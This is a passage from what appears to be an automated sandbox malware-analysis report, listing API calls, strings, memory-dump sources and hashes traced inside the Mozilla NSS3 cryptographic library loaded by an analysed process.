                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C506BF7), ref: 6C506F54
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C506BF7), ref: 6C506FE0
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C506BF7), ref: 6C506FFD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C506F4F
                                                                                                                                                                                                                                                      • NSS_SSL_CBC_RANDOM_IV, xrefs: 6C506FF8
                                                                                                                                                                                                                                                      • SSLFORCELOCKS, xrefs: 6C506F2B
                                                                                                                                                                                                                                                      • # SSL/TLS secrets log file, generated by NSS, xrefs: 6C506EF7
                                                                                                                                                                                                                                                      • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C506FDB
                                                                                                                                                                                                                                                      • SSLKEYLOGFILE, xrefs: 6C506EB1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                                                                                                                                                      • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                                                                                                                                                      • API String ID: 412497378-2352201381
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C485DEC
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C485E0F
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000828), ref: 6C485E35
                                                                                                                                                                                                                                                      • SECKEY_CopyPublicKey.NSS3(?), ref: 6C485E6A
                                                                                                                                                                                                                                                      • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C485EC3
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6C485ED9
                                                                                                                                                                                                                                                      • SECKEY_SignatureLen.NSS3(?), ref: 6C485F09
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C485F49
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C485F89
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C485FA0
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C485FB6
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C485FBF
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C48600C
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C486079
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C486084
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C486094
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2310191401-3916222277
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000144,?,?,?,?,?,6C45B45E,?,?,?,?,?,?,?,?), ref: 6C45B87D
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C45B8FE
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C45B912
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C45B959
                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6C45B977
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,0000002C), ref: 6C45B983
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3 ref: 6C45B9B9
                                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(-00000040,000005DC,?,?), ref: 6C45BA54
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C45BA5F
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C45BA77
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6C45BA96
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C45BA9D
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C45BAB3
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6C45BACD
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C45BAD4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$free$DeleteErrorValuecalloc$CondCountEnterInitializeLastSpin
                                                                                                                                                                                                                                                      • String ID: T ]l$X ]l
                                                                                                                                                                                                                                                      • API String ID: 1841981668-1146210263
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE004,00000000), ref: 6C46F86F
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%lu,?), ref: 6C46F899
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s.%lu,00000000,?), ref: 6C46FA4E
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s.%llu,00000000,00000000,00000000), ref: 6C46FAA2
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s.UNSUPPORTED,00000000), ref: 6C46FAB6
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C46FAC1
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(OID.UNSUPPORTED), ref: 6C46FAD3
                                                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C46FB00
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(OID.%llu.%llu,00000000,?,00000000,FFFFFFD8,00000000,00000000,00000028,00000000), ref: 6C46FB4B
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: R_smprintf$ErrorValue__aulldivfree
                                                                                                                                                                                                                                                      • String ID: %s.%llu$%s.%lu$%s.UNSUPPORTED$OID.%llu.%llu$OID.%lu.%lu$OID.UNSUPPORTED
                                                                                                                                                                                                                                                      • API String ID: 2145857551-3523515424
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000080), ref: 6C589C70
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C589C85
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000), ref: 6C589C96
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C4621BC), ref: 6C45BB8C
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C589CA9
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C539946
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3F16B7,00000000), ref: 6C53994E
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: free.MOZGLUE(00000000), ref: 6C53995E
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C589CB9
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C589CC9
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000), ref: 6C589CDA
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C45BBEB
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C45BBFB
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: GetLastError.KERNEL32 ref: 6C45BC03
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C45BC19
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: free.MOZGLUE(00000000), ref: 6C45BC22
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(?), ref: 6C589CF0
                                                                                                                                                                                                                                                      • PR_NewPollableEvent.NSS3 ref: 6C589D03
                                                                                                                                                                                                                                                        • Part of subcall function 6C57F3B0: PR_CallOnce.NSS3(6C5D14B0,6C57F510), ref: 6C57F3E6
                                                                                                                                                                                                                                                        • Part of subcall function 6C57F3B0: PR_CreateIOLayerStub.NSS3(6C5D006C), ref: 6C57F402
                                                                                                                                                                                                                                                        • Part of subcall function 6C57F3B0: PR_Malloc.NSS3(00000004), ref: 6C57F416
                                                                                                                                                                                                                                                        • Part of subcall function 6C57F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C57F42D
                                                                                                                                                                                                                                                        • Part of subcall function 6C57F3B0: PR_SetSocketOption.NSS3(?), ref: 6C57F455
                                                                                                                                                                                                                                                        • Part of subcall function 6C57F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C57F473
                                                                                                                                                                                                                                                        • Part of subcall function 6C539890: TlsGetValue.KERNEL32(?,?,?,6C5397EB), ref: 6C53989E
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C589D78
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,0000000C), ref: 6C589DAF
                                                                                                                                                                                                                                                      • _PR_CreateThread.NSS3(00000000,6C589EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C589D9F
                                                                                                                                                                                                                                                        • Part of subcall function 6C45B3C0: TlsGetValue.KERNEL32 ref: 6C45B403
                                                                                                                                                                                                                                                        • Part of subcall function 6C45B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C45B459
                                                                                                                                                                                                                                                      • _PR_CreateThread.NSS3(00000000,6C58A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C589DE8
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,0000000C), ref: 6C589DFC
                                                                                                                                                                                                                                                      • _PR_CreateThread.NSS3(00000000,6C58A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C589E29
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,0000000C), ref: 6C589E3D
                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6C589E71
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C589E89
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4254102231-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECKEY_CopyPublicKey.NSS3(?), ref: 6C484014
                                                                                                                                                                                                                                                        • Part of subcall function 6C4839F0: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C485E6F,?), ref: 6C483A08
                                                                                                                                                                                                                                                        • Part of subcall function 6C4839F0: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C485E6F), ref: 6C483A1C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4839F0: memset.VCRUNTIME140(-00000004,00000000,000000A8,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C483A3C
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C484038
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C48404D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C59A0F4), ref: 6C4840C2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C4CF0C8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4CF122
                                                                                                                                                                                                                                                      • SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,00000010,00000000), ref: 6C48409A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C47E708,00000000,00000000,00000004,00000000), ref: 6C4CBE6A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C4804DC,?), ref: 6C4CBE7E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C4CBEC2
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4840DE
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4840F4
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C484108
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,00000010), ref: 6C48411A
                                                                                                                                                                                                                                                      • SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,000000C8), ref: 6C484137
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,-0000001C,-00000020), ref: 6C484150
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,-00000010,6C59A1C8), ref: 6C48417E
                                                                                                                                                                                                                                                      • SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,0000007C), ref: 6C484194
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C4841A7
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4841B2
                                                                                                                                                                                                                                                      • PK11_DestroyObject.NSS3(?,?), ref: 6C4841D9
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4841FC
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C59A1A8), ref: 6C48422D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Item_$Arena_$Copy$ArenaFree$AlgorithmEncodeError$Alloc_Value$AllocateCriticalDestroyEnterFindInitK11_LockObjectPoolPublicSectionTag_UnlockZfreecallocmemset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 912348568-0
                                                                                                                                                                                                                                                      • Opcode ID: ee8added3202c64b77945b169b3258f19ab5ab8a36f67b19477c5609cd611f08
                                                                                                                                                                                                                                                      • Instruction ID: bb4522adccc4efbbcbfb076fbc69916fc67f739904fb53d7cd31308e9ec1c8dd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee8added3202c64b77945b169b3258f19ab5ab8a36f67b19477c5609cd611f08
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D45127B5B063006BF710DA299C55F6776ECDF5028DF04162DEC5AC6F92FB31E50882A2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8E7B
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8E9E
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(6C5D0B64,00000001,?,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8EAD
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8EC3
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8ED8
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8EE5
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C4C8E01), ref: 6C4C8EFB
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C5D0B64,6C5D0B64), ref: 6C4C8F11
                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C4C8F3F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C4CA421,00000000,00000000,6C4C9826), ref: 6C4CA136
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4C904A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C4C8E76
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                                                                                                                                                                                      • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                                                                                                                                                                                      • API String ID: 977052965-1032500510
                                                                                                                                                                                                                                                      • Opcode ID: 8fcf4c89f4c3539f350e3e80c07cbfba7a9924204774654007f4f36c7fb4c83c
                                                                                                                                                                                                                                                      • Instruction ID: 4c9a40202377236fb40e3c15bf405cad87d8915af0cdf4035df5ba189808f4d9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fcf4c89f4c3539f350e3e80c07cbfba7a9924204774654007f4f36c7fb4c83c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1461BFB9E01115ABDB10CF56CC80EABB7B5FF94359F144128DC18A7710E732E915CBA1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C478E5B
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C478E81
                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C478EED
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C5A18D0,?), ref: 6C478F03
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C478F19
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C478F2B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C478F53
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C478F65
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C478FA1
                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(?), ref: 6C478FFE
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C479012
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C479024
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C47902C
                                                                                                                                                                                                                                                      • PORT_DestroyCheapArena.NSS3(?), ref: 6C47903E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                      • API String ID: 3512696800-3315324353
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C53CC7B), ref: 6C53CD7A
                                                                                                                                                                                                                                                        • Part of subcall function 6C53CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C4AC1A8,?), ref: 6C53CE92
                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C53CDA5
                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C53CDB8
                                                                                                                                                                                                                                                      • PR_UnloadLibrary.NSS3(00000000), ref: 6C53CDDB
                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C53CD8E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4605C0: PR_EnterMonitor.NSS3 ref: 6C4605D1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4605C0: PR_ExitMonitor.NSS3 ref: 6C4605EA
                                                                                                                                                                                                                                                      • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C53CDE8
                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C53CDFF
                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C53CE16
                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C53CE29
                                                                                                                                                                                                                                                      • PR_UnloadLibrary.NSS3(00000000), ref: 6C53CE48
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                                                                                                      • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                                                                                                      • API String ID: 601260978-871931242
                                                                                                                                                                                                                                                      APIs
